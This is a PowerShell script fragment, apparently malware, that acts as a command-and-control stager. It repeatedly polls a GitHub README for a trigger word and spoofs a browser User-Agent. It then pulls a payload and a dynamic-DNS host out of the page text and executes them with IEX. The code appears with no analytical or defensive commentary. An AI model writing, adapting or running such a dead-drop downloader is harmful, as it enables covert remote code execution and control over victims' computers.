        $Word = 'GGGHHHJJJ_now'
        $WebClientObject = New-Object Net.WebClient
        $comment = "https://raw.githubusercontent.com/raistlinm/check/master/README.md"
        $WebClientObject.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36)")
        While($conn -ne 0){
            netstat -an |findstr EST |findstr 192.210
                $conn = $LASTEXITCODE
                $CommentResult = $WebClientObject.DownloadString($comment)
                $Found = $CommentResult.contains($Word)
                If($Found) {
                        $WebClientObject = New-Object Net.WebClient
                        $comment = "https://raw.githubusercontent.com/raistlinm/check/master/README.md"
                        $WebClientObject.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36)")
                        $CommentResult -match "(?<=.*Focus).+(?=Focus.*)"
                        $url = $matches[0]
                        $CommentResult -match "(?<=.*Run).+(?=Run.*)"
                        $pay = $matches[0]
                        $url = $url+".dyndns-ip.com"
                        $full_pay = $pay+$url
                        IEX $full_pay
                }
Start-Sleep -Seconds 165
}
